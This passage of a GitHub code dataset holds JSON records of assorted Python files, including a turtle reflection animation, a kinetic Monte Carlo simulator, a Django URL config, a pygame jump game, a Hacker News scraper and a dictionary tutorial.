\r\n self.objectives['dirty-alert'].is_in_course = True\r\n \r\n robot_pos = self.x, self.y\r\n obstacles = ((Void, Obstacle, Void),)\r\n pi, visit = find_paths(env, robot_pos, obstacles)\r\n\r\n if active_objective:\r\n if active_objective.name not in ['clear-block', 'dirty-alert', 'move-in-playpen']:\r\n # Search closest objective\r\n closest_objective_name, closest_target_pos = self.get_closest_objective(env, pi, visit)\r\n if active_objective.name != closest_objective_name:\r\n if not self.change_behaviour and not self.carried_child:\r\n self.interrupted_objectives += 1\r\n active_objective.is_in_course = False\r\n active_objective = self.objectives[closest_objective_name]\r\n active_objective.is_in_course = True\r\n else:\r\n self.change_behaviour = False\r\n \r\n active_objective.perform(active_objective, env, self, env_info)\r\n completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n if completed:\r\n active_objective.is_in_course = False\r\n self.interrupted_objectives = 0\r\n else:\r\n # Search closest objective\r\n closest_objective_name, _ = self.get_closest_objective(env, pi, visit)\r\n active_objective = self.objectives[closest_objective_name]\r\n 
active_objective.is_in_course = True\r\n                    active_objective.perform(active_objective, env, self, env_info)\r\n                    completed = active_objective.check_if_completed(active_objective, env, self, env_info)\r\n\r\n                    if completed:\r\n                        active_objective.is_in_course = False\r\n                        self.interrupted_objectives = 0","repo_name":"ginrod/agents","sub_path":"src/agents.py","file_name":"agents.py","file_ext":"py","file_size_in_byte":25170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"35199829038","text":"import time\r\nimport turtle\r\nimport random\r\nfrom math import *\r\nwn = turtle.Screen()\r\nwn.title(\"Circular mirror\")\r\nwn.setup(500,500)\r\nwn.tracer(0)\r\nt = turtle.Turtle()\r\np = turtle.Turtle()\r\ntu = turtle.Turtle()\r\nt.hideturtle()\r\np.hideturtle()\r\ntu.hideturtle()\r\ntu.speed(0)\r\ndef C(r,tu):\r\n    tu.color(\"black\",\"yellow\")\r\n    tu.pu()\r\n    tu.fd(r)\r\n    tu.left(90)\r\n    tu.pd()\r\n    t.begin_fill()\r\n    tu.circle(r)\r\n    t.end_fill()\r\n    tu.pu()\r\n    tu.right(90)\r\n    tu.bk(r)\r\nr = 5\r\nR = 250\r\ntu.pu()\r\ntu.fd(R)\r\ntu.left(90)\r\ntu.pd()\r\ntu.circle(R)\r\ntu.pu()\r\ntu.right(90)\r\ntu.bk(R)\r\n\r\nt.pu()\r\nt.goto(random.randint(-100,100),random.randint(-100,100))\r\n# t.goto(0,245*sin(radians(30)))\r\np.pu()\r\np.goto(t.pos())\r\nt.setheading(random.randint(0,360))\r\nx = t.xcor()\r\ny = t.ycor()\r\np.pd()\r\nwhile True:\r\n    while x**2 + y**2 <= (250-r)**2:\r\n        t.fd(1)\r\n        p.goto(t.pos())\r\n        t.pd()\r\n        C(r,t)\r\n        t.pu()\r\n        x = t.xcor()\r\n        y = t.ycor()\r\n        wn.update()\r\n        time.sleep(0.001)\r\n        t.clear()\r\n    else:\r\n        # atan2 handles x == 0 and picks the correct quadrant for the\r\n        # surface normal; plain atan(y/x) fails on half the circle\r\n        th = t.heading()-degrees(atan2(y, x))\r\n        alph = 180 - 2*th\r\n        t.left(alph)\r\n        t.fd(1)\r\n        p.goto(t.pos())\r\n        t.pd()\r\n        C(r, t)\r\n        t.pu()\r\n        x = t.xcor()\r\n        y = t.ycor()\r\n        wn.update()\r\n        time.sleep(0.001)\r\n        t.clear()\r\n        continue\r\n\r\n\r\nturtle.done()","repo_name":"DixonLYK/Dixon-s-Python-Turtle-Portfolio","sub_path":"Circular mirror.py","file_name":"Circular mirror.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
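# --- Illustrative sketch (not from the repository above): the reflection law
# that the Circular mirror script implements, isolated for clarity. All names
# here are hypothetical. For a ray hitting a circle centered at the origin at
# (x, y), the outward normal has angle atan2(y, x) and the bounced heading is
# 2*normal - heading + 180 (degrees, turtle convention).
from math import atan2, degrees

def reflected_heading(heading, x, y):
    normal = degrees(atan2(y, x))   # angle of the surface normal at the hit point
    return (2 * normal - heading + 180) % 360

# A ray moving along +x that hits the circle at (250, 0) bounces straight back:
assert reflected_heading(0, 250, 0) == 180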
+{"seq_id":"24177734331","text":"import logging\nfrom app import create_app\nfrom flask_script import Manager\nfrom flask_migrate import MigrateCommand\n\napp = create_app('default')\nmanager = Manager(app)\nmanager.add_command('db', MigrateCommand)\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO,\n                        format=\"%(asctime)s[%(name)s][%(levelname)s] :%(levelno)s: %(message)s\",\n                        datefmt='%a, %d %b %Y %H:%M:%S',\n                        filename='logs/weChatService.log',\n                        filemode='a')\n    manager.run()\n","repo_name":"Zhanben/wechatsite","sub_path":"manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"14978542277","text":"import argparse\nfrom time import sleep\nfrom os.path import splitext, join, exists\nfrom os import remove\n\n\ndef main():\n    description = 'Compare different pedestal techniques'\n    parser = argparse.ArgumentParser(description=description)\n    parser.add_argument('-f', '--file', dest='input_path', action='store',\n                        required=True, help='path to the TIO run file')\n    parser.add_argument('-T', '--time', dest='time', action='store',\n                        type=float, default=0.1,\n                        help='time to wait between line writes')\n\n    args = parser.parse_args()\n\n    ip = args.input_path\n    op = splitext(ip)[0] + \"_sim.txt\"\n    if exists(op):\n        remove(op)\n\n    with open(op, 'w+') as output:\n        print(\"Writing to: {}\".format(op))\n        with open(ip, 'r') as file:\n            while True:\n                line = file.readline()\n                if not line:\n                    break  # end of file; stop instead of writing empty lines forever\n                output.write(line)\n                print(\"Wrote line: {}\".format(line))\n                sleep(args.time)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"watsonjj/chec_operator","sub_path":"executables/simulate_monitor_write.py","file_name":"simulate_monitor_write.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"18569751388","text":"from copy import deepcopy\nfrom helpers import *\n\nlines = getlines(5)\ntotal = 0\n\nbreakIndex = lines.index(\"\")\norigStacks = [[c for c in stack[::-1] if c != \" \"] for stack in zip(*(line[1::4] for line in lines[:breakIndex-1]))]\n\ndef run(part2):\n\tstacks = deepcopy(origStacks)\n\tfor line in lines[breakIndex+1:]:\n\t\t_, nToMove, _, fromInd, _, toInd = getparts(line, \" \", \"sisisi\")\n\t\ttop = stacks[fromInd-1][-nToMove:]\n\t\tstacks[toInd-1] += stacks[fromInd-1][-nToMove:][::1 if part2 else -1]\n\t\tstacks[fromInd-1] = stacks[fromInd-1][:-nToMove]\n\n\tprint(\"\".join([s[-1] for s in stacks if len(s) > 0]))\n\nrun(False)\nrun(True)","repo_name":"yokljo/aoc2022","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"44265930661","text":"from bs4 import BeautifulSoup\nimport lxml\nimport requests\n\nresponse = requests.get(\"https://news.ycombinator.com/\")\nyc_web_page = response.text\n\nsoup = BeautifulSoup(yc_web_page, \"html.parser\")\n\n# the href lives on the anchor inside the titleline span, not on the span itself\narticle_title = soup.find(class_=\"titleline\").get_text()\narticle_link = soup.find(class_=\"titleline\").find(\"a\").get(\"href\")\narticle_score = soup.find(class_=\"score\").get_text()\n\n\nprint(article_title)\nprint(article_link)\nprint(article_score)\n","repo_name":"beatrizdile/python-bootcamp","sub_path":"Section-4-39/day-39-web-scraping-beautiful-soup/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
+{"seq_id":"14978542277","text":"import numpy as np\nimport random\nimport time\nimport common.physcons as pc\n\nfrom common.Exceptions import NoReacMol\nfrom common.criteria import EPS_FSTRICT\n\n\n\n#=====================================================#\ndef calculate_propensities(dxvec, processes):\n    '''\n    Calculates the propensity of each reaction\n    '''\n    propensities = []\n    total_propensity = 0.0\n    for Rs,Ps,ks in processes:\n        prop = ks\n        for Ri in Rs: prop *= dxvec[Ri]\n        propensities.append( prop )\n        total_propensity += prop\n    return propensities, total_propensity\n#-----------------------------------------------------#\ndef generate_random(eps=EPS_FSTRICT):\n    '''\n    Generates a random number, excluding those smaller than eps\n    '''\n    while True:\n        randx=random.random() \n        if randx >= eps: return randx\n#=====================================================#\n\n\n\n\n
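# --- Illustrative sketch (names and numbers are hypothetical, not from the
# module above): one step of the direct method that kmc() performs with the
# helpers calculate_propensities() and generate_random(). The waiting time is
# tau = ln(1/r1)/a0, and the firing reaction is chosen by scanning the
# cumulative propensities against r2 * a0.
import random
from math import log

propensities = [2.0, 1.0, 1.0]             # a_1, a_2, a_3
a0 = sum(propensities)                     # total propensity, here 4.0
r1, r2 = random.random(), random.random()

tau = log(1.0 / r1) / a0                   # exponentially distributed time step

threshold, cumulative = r2 * a0, 0.0
for target, prop in enumerate(propensities):
    cumulative += prop
    if cumulative >= threshold:
        break                              # reaction 0 fires with probability 2/4
print("fire reaction", target, "after tau =", tau)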
#=====================================================#\ndef kmc(ipops, processes, excess_species=None, volume=1.0/pc.ML, nstpdata=1000):\n    '''\n    ipops    : dictionary with initial populations (only needed those != 0.0)\n    processes: a list with the reactants, products and the rate constant\n               processes[idx] = (Rs,Ps,k)\n\n    INPUT UNITS: atomic units\n       concentrations: molecules/bohr**3\n       volume        : bohr**3\n       rate constants: in au\n    '''\n\n    #----------------------------#\n    # set initial concentrations #\n    #  and reactant molecules    #\n    #----------------------------#\n    reactants = []\n    for Rs,Ps,k in processes:\n        for species in Rs+Ps:\n            if species not in ipops.keys(): ipops[species] = 0.0\n            bool1 = species in excess_species\n            bool2 = species in reactants\n            if (not bool1) and (not bool2): reactants.append(species)\n\n    #------------------------#\n    # rate constants to s^-1 #\n    #------------------------#\n    for idx,(Rs,Ps,k) in enumerate(processes):\n        nR = len(Rs)\n        k /= volume**(nR-1)\n        processes[idx] = (Rs,Ps,k)\n\n    #-----------------------------------------#\n    # Get dict of xvec and limiting molecules #\n    #-----------------------------------------#\n    dxvec = ipops.copy()\n    try   : N0 = min([pop for pop in dxvec.values() if pop != 0.0])\n    except: N0 = 0.0\n    if N0 == 0.0: raise NoReacMol(Exception)\n    \n    # --------------------------#\n    # START KINETIC MONTE-CARLO #\n    # --------------------------#\n    # initialize variables\n    tau, tx = 0.0, 0.0\n    jcount = 0\n\n    # data\n    xvalues = [tx]\n    yvalues = {key:[val] for key,val in dxvec.items()}\n\n    Nj = N0\n    xi = np.array([ dxvec[species] for species in sorted(dxvec.keys())])\n    while Nj > 0.0:\n        # compare each 1000 steps\n        if jcount % 1000 == 0 and jcount > 0:\n            xj = np.array([ dxvec[species] for species in sorted(dxvec.keys())])\n            diff = np.linalg.norm(xj-xi)/1000\n            if diff < 1e-4: break\n            xi = xj\n        # calculate propensities\n        propensities, tot_propensity = calculate_propensities(dxvec,processes)\n        # nothing can react; stop before selecting and firing a process\n        if tot_propensity == 0.0: break\n        # generate two random numbers \n        r1=generate_random() # 1) Tau (time)\n        r2=generate_random() # 2) Changes in population\n        # Select process (stacking)\n        value = tot_propensity * r2\n        sum_props = 0.0\n        for target,prop in enumerate(propensities):\n            sum_props += prop\n            if sum_props >= value: break\n        # Modify populations (except those in excess)\n        Rs,Ps,ks = processes[target]\n        for Ri in Rs:\n            if Ri not in excess_species: dxvec[Ri] -= 1.0\n        for Pi in Ps:\n            if Pi not in excess_species: dxvec[Pi] += 1.0\n        # Time step\n        tau = np.log(1./r1)/tot_propensity\n        tx += tau\n        # Keep data\n        jcount += 1\n        if jcount%nstpdata==0:\n           xvalues.append(tx)\n           for specie in dxvec.keys():\n               yvalues[specie].append( dxvec[specie] )\n        \n        # Calculate current number of reactant molecules\n        Nj = sum([dxvec[specie] for specie in reactants])\n\n    return xvalues, yvalues\n#=====================================================#\n\n\n","repo_name":"cathedralpkg/Pilgrim","sub_path":"src/modpilgrim/kmc.py","file_name":"kmc.py","file_ext":"py","file_size_in_byte":4247,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} 
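# --- Illustrative usage sketch for the kmc() routine above; the process and
# populations are hypothetical. Note that kmc() iterates over excess_species,
# so an explicit (possibly empty) list must be supplied.
processes = [(["A"], ["B"], 1.0e-3)]   # unimolecular decay A -> B, rate constant in au
ipops = {"A": 1000.0}

times, populations = kmc(ipops, processes, excess_species=[], nstpdata=10)
print(times[-1], populations["A"][-1], populations["B"][-1])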
+{"seq_id":"39253072623","text":"def main():\n    n = int(input(\"Enter the number of orders: \"))\n    \n    total = 0\n    \n    for i in range(1, n + 1):\n        pedido = input(\"Enter the order name: \").split(\" \")\n        valor = float(input('Enter the order amount: R$ '))\n        total += valor\n\n    valor_desconto = str(input(\"Enter the discount percentage (10/20): \"))\n    get_desc = valor_desconto[:2]  # first two characters; slicing never raises IndexError\n    \n    while(get_desc != '10' and get_desc != '20'):\n        print(\"Sorry, that discount is not available! Please try again!\")\n        valor_desconto = input(\"Enter the discount percentage (10/20): \")\n        get_desc = valor_desconto[:2]\n    else:\n        if get_desc == '10':\n            desconto = total - (total * 0.1)\n            print('')\n            print(f'Total with a 10% discount: R$ {desconto:.2f}')\n            total = 0\n            print('')\n        elif get_desc == '20':\n            desconto = total - (total * 0.2)\n            print('')\n            print(f'Total with a 20% discount: R$ {desconto:.2f}')\n            total = 0\n            print('')\n        else:\n            return\n    \n    \nif __name__ == \"__main__\":\n    main()","repo_name":"Ismagold67/systemDeliveryJavaAndPython","sub_path":"miniSystemDeliveryPhyton/sistemaDePedidosDelivery.py","file_name":"sistemaDePedidosDelivery.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
+{"seq_id":"70157245546","text":"from dataclasses import dataclass\nimport datetime\nfrom . import UseCase\nfrom domain.data_repository.blockchain_data_repository import BlockchainDataRepository\nfrom domain.data_repository.mempool_data_repository import MempoolDataRepository\nfrom domain.model.block import Block\n\n\n@dataclass\nclass CreateBlockUCParams:\n    proof: str\n    previous_hash: str\n\n\nclass CreateBlockUC(UseCase):\n    def __init__(self, blockchain_repository: BlockchainDataRepository,\n                 mempool_data_repository: MempoolDataRepository):\n        self.blockchain_repository = blockchain_repository\n        self.mempool_data_repository = mempool_data_repository\n\n    def execute(self, params: CreateBlockUCParams) -> Block:\n        last_index = self.blockchain_repository.get_last_index()\n        transactions = self.mempool_data_repository.get_transactions()\n        block = Block(index=last_index + 1,\n                      timestamp=str(datetime.datetime.now()),\n                      proof=params.proof,\n                      previous_hash=params.previous_hash,\n                      transactions=transactions)\n        self.blockchain_repository.insert_block(block)\n        self.mempool_data_repository.clear_transactions()\n        return block\n","repo_name":"gabrielmoreira-dev/blockchain-flask","sub_path":"domain/use_case/create_block_uc.py","file_name":"create_block_uc.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"43402177103","text":"'''\nCreated on Aug 27, 2018\n\n@author: Clark\n'''\n\n# ----- Insert that snippet to run distributed jobs -----\n\nimport os\nimport tensorflow as tf\nfrom clusterone import get_data_path, get_logs_path\n\nDATASET_NAME = \"\"\nLOCAL_REPO = \"\"\n\nclass distributed_env():\n    '''\n    Specifying paths when working locally.\n    For convenience we use a clusterone wrapper (get_data_path below) to be able\n    to switch from local to clusterone without changing the code.\n    '''\n\n    def __init__(self, local_data_path=None,\n                 cloud_data_path=None,\n                 logs_path=None,\n                 local_repo=None,\n                 cloud_user_repo=None,\n                 flags=tf.app.flags):\n\n        self.data_path = local_data_path\n        self.logs_path = logs_path\n        self.local_repo = local_repo\n        self.cloud_data_path = cloud_data_path\n        self.cloud_user_repo = cloud_user_repo\n        self.flags = flags\n\n    def get_env(self):\n        # Configure distributed task\n        try:\n            job_name = os.environ['JOB_NAME']\n            task_index = os.environ['TASK_INDEX']\n            ps_hosts = os.environ['PS_HOSTS']\n            worker_hosts = os.environ['WORKER_HOSTS']\n        except KeyError:\n            job_name = None\n            task_index = 0\n            ps_hosts = None\n            worker_hosts = None\n\n        flags = self.flags\n        # Flags for configuring the distributed task\n        flags.DEFINE_string(\"job_name\", job_name,\n                            \"job name: worker or ps\")\n        
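# --- Illustrative wiring sketch for the CreateBlockUC use case above. The two
# in-memory repositories here are hypothetical stand-ins for the abstract
# BlockchainDataRepository / MempoolDataRepository interfaces.
class InMemoryBlockchainRepo:
    def __init__(self):
        self.blocks = []

    def get_last_index(self):
        return self.blocks[-1].index if self.blocks else 0

    def insert_block(self, block):
        self.blocks.append(block)


class InMemoryMempoolRepo:
    def __init__(self):
        self.transactions = []

    def get_transactions(self):
        return list(self.transactions)

    def clear_transactions(self):
        self.transactions.clear()


use_case = CreateBlockUC(InMemoryBlockchainRepo(), InMemoryMempoolRepo())
block = use_case.execute(CreateBlockUCParams(proof="42", previous_hash="0xabc"))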
flags.DEFINE_integer(\"task_index\", task_index,\n                             \"Worker task index, should be >= 0. task_index=0 is \"\n                             \"the chief worker task that performs the variable \"\n                             \"initialization and checkpoint handling\")\n        flags.DEFINE_string(\"ps_hosts\", ps_hosts,\n                            \"Comma-separated list of hostname:port pairs\")\n        flags.DEFINE_string(\"worker_hosts\", worker_hosts,\n                            \"Comma-separated list of hostname:port pairs\")\n\n        # Training related flags\n        flags.DEFINE_string(\"data_dir\",\n                            get_data_path(\n                                dataset_name = self.cloud_user_repo, #all mounted repo\n                                local_root = self.data_path,\n                                local_repo = self.local_repo,\n                                path = self.cloud_data_path\n                            ),\n                            \"Path to dataset. It is recommended to use get_data_path()\"\n                            \"to define your data directory so that you can switch \"\n                            \"from local to clusterone without changing your code.\"\n                            \"If you set the data directory manually make sure to use\"\n                            \"/data/ as root path when running on ClusterOne cloud.\")\n\n        flags.DEFINE_string(\"log_dir\",\n                            get_logs_path(root=self.logs_path),\n                            \"Path to store logs and checkpoints. It is recommended\"\n                            \"to use get_logs_path() to define your logs directory\"\n                            \"so that you can switch from local to clusterone without\"\n                            \"changing your code.\"\n                            \"If you set your logs directory manually make sure\"\n                            \"to use /logs/ when running on ClusterOne cloud.\")\n\n        self.flags = flags\n    def device_and_target(self):\n        # If FLAGS.job_name is not set, we're running single-machine TensorFlow.\n        # Don't set a device.\n        FLAGS = self.flags.FLAGS  # flag values live on FLAGS, not on the flags module\n        if FLAGS.job_name is None:\n            print(\"Running single-machine training\")\n            return (None, \"\")\n\n        # Otherwise we're running distributed TensorFlow\n        print(\"Running distributed training\")\n        if FLAGS.task_index is None or FLAGS.task_index == \"\":\n            raise ValueError(\"Must specify an explicit `task_index`\")\n\n        if FLAGS.ps_hosts is None or FLAGS.ps_hosts == \"\":\n            raise ValueError(\"Must specify an explicit `ps_hosts`\")\n\n        if FLAGS.worker_hosts is None or FLAGS.worker_hosts == \"\":\n            raise ValueError(\"Must specify an explicit `worker_hosts`\")\n\n        cluster_spec = tf.train.ClusterSpec({\n            \"ps\": FLAGS.ps_hosts.split(\",\"),\n            \"worker\": FLAGS.worker_hosts.split(\",\"),\n        })\n\n        server = tf.train.Server(\n            cluster_spec, job_name=FLAGS.job_name, task_index=FLAGS.task_index)\n        if FLAGS.job_name == \"ps\":\n            server.join()\n\n        worker_device = \"/job:worker/task:{}\".format(FLAGS.task_index)\n\n        # The device setter will automatically place Variable ops on separate\n        # parameter servers (ps). The non-Variable ops will be placed on the workers.\n        return (\n            tf.train.replica_device_setter(\n                worker_device=worker_device,\n                cluster=cluster_spec),\n            server.target,\n        )\n\n# --- end of snippet ----\n","repo_name":"Cheng-Lin-Li/show-attend-and-tell","sub_path":"clusterone_config.py","file_name":"clusterone_config.py","file_ext":"py","file_size_in_byte":5106,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} 
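# --- Illustrative usage sketch for the distributed_env helper above (TF1-era
# API; the paths are hypothetical). device_and_target() returns a device
# function for tf.device() plus the session master.
env = distributed_env(local_data_path="/tmp/data", logs_path="/tmp/logs")
env.get_env()
device, target = env.device_and_target()

# Variables land on the parameter servers, other ops on this worker:
with tf.device(device):
    global_step = tf.train.get_or_create_global_step()

with tf.train.MonitoredTrainingSession(master=target) as sess:
    sess.run(global_step)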
+{"seq_id":"40418380780","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n    path('', views.HomeView.as_view(), name='home'),\n    path('listar/', views.PostsListView.as_view(), name='listarposts'),\n    path('detalhe/<int:pk>/', views.DetalhePostView.as_view(), name='detalhepost'),\n    path('enviar/<int:pk>/', views.EnviarPostFormView.as_view(), name='enviarpost'),\n    path('comentario/<int:pk>/', views.ComentarioCreateView.as_view(),\n         name='comentpost'),\n    path('cadusuario/', views.CadUsuarioView.as_view(), name='cadusuario'),\n    path('login/', views.LoginUserView.as_view(), name='loginuser'),\n    path('logout/', views.LogoutUserView.as_view(), name='logoutuser'),\n]","repo_name":"marcos-faino/blogifro2023-2","sub_path":"postagens/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} 
+{"seq_id":"41216552100","text":"from sys import exit\nfrom Player import *\nfrom Vehicle import *\nfrom GameOver import *\nfrom Level import *\nimport pygame\n\n\npygame.init()\nfont = pygame.font.SysFont(\"calibri\", 40)\nkey = pygame.key.get_pressed()\nscreen = pygame.display.set_mode((640,480),0,32)\npygame.display.set_caption(\"JumpGame\")\n\nback = pygame.Surface((640,480))\nbackground = back.convert()\nbackground.fill(Shared.WHITE)\nbackgroundImage = pygame.image.load(os.path.join('Images', 'backgroundImage.png')).convert_alpha()\nclock = pygame.time.Clock()\n\nwhile Shared.inGame:\n    Shared.dt = clock.tick(60)\n    scoreText = font.render(\"Score : \", True, (Shared.GREEN))  # score label\n    scoreTextLevel = font.render(\"Level : \", True, (Shared.GREEN))  # level label\n    score1 = font.render(str(Shared.score), True, (Shared.GREEN))  # score value\n    score2 = font.render(str(Shared.level), True, (Shared.GREEN))  # level value\n\n    screen.blit(backgroundImage, (0, 0))\n    screen.blit(scoreText, (5, 5))\n    screen.blit(scoreTextLevel, (5, 50))\n    screen.blit(score2, (130, 50))\n    screen.blit(score1, (130, 8))\n    screen.blit(Shared.car, (Shared.positionCarX, 351))\n    screen.blit(Shared.character, (Shared.positionCharacterX, Shared.positionCharacterY))\n\n    for event in pygame.event.get():\n        if event.type == QUIT:\n            exit()\n        if event.type == KEYDOWN:\n            if event.key == K_SPACE:\n                if Shared.positionCharacterY >= 350 and Shared.positionCharacterY < 359:\n                    CheckLevel()\n                    Shared.character = pygame.image.load(os.path.join('Images', 'characterJump.png'))\n                    Shared.moveCharacterY = Shared.speedCharacterY\n            if event.key == K_LEFT:\n                Shared.moveCharacterX = Shared.speedCharacterX\n            if event.key == K_RIGHT:\n                Shared.moveCharacterX = -Shared.speedCharacterX\n        elif event.type == KEYUP:\n            if event.key == K_LEFT:\n                Shared.moveCharacterX = 0\n            if event.key == K_RIGHT:\n                Shared.moveCharacterX = 0\n\n    BlockWall()\n    Jump()\n    AvoidPositionXBug()\n    MoveCharacter()\n    MoveCar()\n    CheckUpCrash()\n    SpeedLevel()\n    SoundLevel()\n\n    if Shared.trafic == \"right\":\n        ModelCarRight()\n    else:\n        ModelCarLeft()\n\n    pygame.display.update()\n\n\nif __name__ != '__main__':\n    print(\"You must start me as the main module.\")","repo_name":"MaxyArthes/MaxyArthesProg","sub_path":"Pygame/JumpGame/Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
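# --- Illustrative sketch: resolving the named routes from the urls.py module
# above with Django's reverse(); the pk value 42 is hypothetical, and the
# routes are assumed to use the <int:pk> converters shown there.
from django.urls import reverse

detail_url = reverse('detalhepost', args=[42])   # -> '/detalhe/42/'
login_url = reverse('loginuser')                 # -> '/login/'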
+{"seq_id":"70792540906","text":"import pandas as pd\nimport pickle\nfrom typing import List\nfrom .feature_processor import FeatureProcessor\nfrom matcher.config import RANKED_LIST_PATH\n\n\nclass AggregatedVectorFeatures(FeatureProcessor):\n    def __init__(self, feature_names: List[str]):\n        super().__init__(feature_names)\n        with open(RANKED_LIST_PATH, 'rb') as f:\n            self.ranked_list = pickle.load(f)\n\n    @property\n    def processor_name(self) -> str:\n        return \"Aggregated vector features\"\n\n    def preprocess(self, df: pd.DataFrame) -> pd.DataFrame:\n        df = super().preprocess(df)\n        return df\n\n    def compute_pair_feature(self, df: pd.DataFrame) -> pd.DataFrame:\n        subm = []\n        for i in range(len(df)):\n            q = self.ranked_list[df.variantid1[i]]\n            try:\n                k = (100 - q.index(df.variantid2[i])) / 100\n            except ValueError:  # variantid2 is not in the ranked list\n                k = 0\n            subm.append(k)\n\n        df[\"vector_pred\"] = subm\n        return df\n","repo_name":"EgorSmi/matcher","sub_path":"matcher/features/aggregated_vector_features.py","file_name":"aggregated_vector_features.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
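# --- Worked example of the rank-to-score mapping in compute_pair_feature()
# above (the item ids are hypothetical): a candidate at position i of the
# ranked list scores (100 - i) / 100, and anything absent scores 0.
ranked = {"item-a": ["item-b", "item-c", "item-d"]}
candidates = ranked["item-a"]
try:
    score = (100 - candidates.index("item-d")) / 100   # index 2 -> 0.98
except ValueError:
    score = 0
print(score)  # 0.98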
+{"seq_id":"25811833947","text":"# A dictionary is written as key-value pairs\nthisdict = {\n  \"brand\": \"Ford\",\n  \"model\": \"Mustang\",\n  \"year\": 1964\n}\nprint(thisdict[\"brand\"])\n\n# duplicate keys are not allowed; a repeated key overwrites the earlier value\nthisdicta = {\n  \"brand\": \"Ford\",\n  \"model\": \"Mustang\",\n  \"year\": 1964,\n  \"year\": 2020\n}\nprint(thisdicta) \n\n# len() gives the number of key-value pairs\nprint(len(thisdicta))\n\n# values can be of any data type: boolean, number, string, list\nOnedict = {\n  \"brand\": \"Ford\",\n  \"electric\": False,\n  \"year\": 1964,\n  \"colors\": [\"red\", \"white\", \"blue\"]\n} \n# a value is accessed with bracket notation [] and the key name\ngd = Onedict[\"colors\"]\nprint(gd)\n# get() works the same way and returns the value for a key\n# keys() returns the dictionary's keys\nsd = Onedict.keys()\nprint(sd)\n# values() returns the dictionary's values\nprint(Onedict.values())\n\n# updating a value in a dictionary\ncar = {\n\"brand\": \"Ford\",\n\"model\": \"Mustang\",\n\"year\": 1964\n}\nx = car.values()\nprint(x)  # before the change\ncar[\"year\"] = 2020\nprint(x)  # after the change\n\n# items() returns all key-value pairs for iteration\nprint(car.items())\n\n# add a new key-value pair to a dictionary\ncar[\"colors\"] = \"Vanta Black\"\nprint(car)\n\n# check whether a key is present in a dict\nif \"colors\" in car:\n    print(\"colors is present in the dictionary\")\n\n# update() updates (or inserts) key-value pairs\ncar.update({\"year\": \"2025\"})\n# print the updated value\nprint(car)\n\n# pop() removes an item from a dict by key\ncar.pop(\"model\")\nprint(car)\n\n# popitem() removes the last inserted item; del removes a given key; clear() empties the dict\n\n# iterate over a dict with a loop, or via keys(), values() and items()\nfor a in car: \n    print(a)\n    \n# print keys and values together\nfor a, b in car.items(): \n    print(a, b) \n\n\n# copy() makes a shallow copy of a dict\nthisdict = {\n  \"brand\": \"Ford\",\n  \"model\": \"Mustang\",\n  \"year\": 1964\n}\nmydict = thisdict.copy()\nprint(mydict)\n\n\n# dictionaries can also be deeply nested\nmyfamily = {\n  \"child1\" : {\n    \"name\" : \"Emil\",\n    \"year\" : 2004\n  },\n  \"child2\" : {\n    \"name\" : \"Tobias\",\n    \"year\" : 2007\n  },\n  \"child3\" : {\n    \"name\" : \"Linus\",\n    \"year\" : 2011\n  }\n} \n\n# the same nesting can be built from separate dicts to keep things readable\nchild1 = {\n  \"name\" : \"Emil\",\n  \"year\" : 2004\n}\nchild2 = {\n  \"name\" : \"Tobias\",\n  \"year\" : 2007\n}\nchild3 = {\n  \"name\" : \"Linus\",\n  \"year\" : 2011\n}\n\nmyfamily = {\n  \"child1\" : child1,\n  \"child2\" : child2,\n  \"child3\" : child3\n}\n\nprint(myfamily)\n \n# setdefault() returns the value for a key, inserting a default if the key is missing\njj = car.setdefault(\"brand\")\nprint(jj)\n","repo_name":"hamza4600/basic-Python","sub_path":"dictonary.py","file_name":"dictonary.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
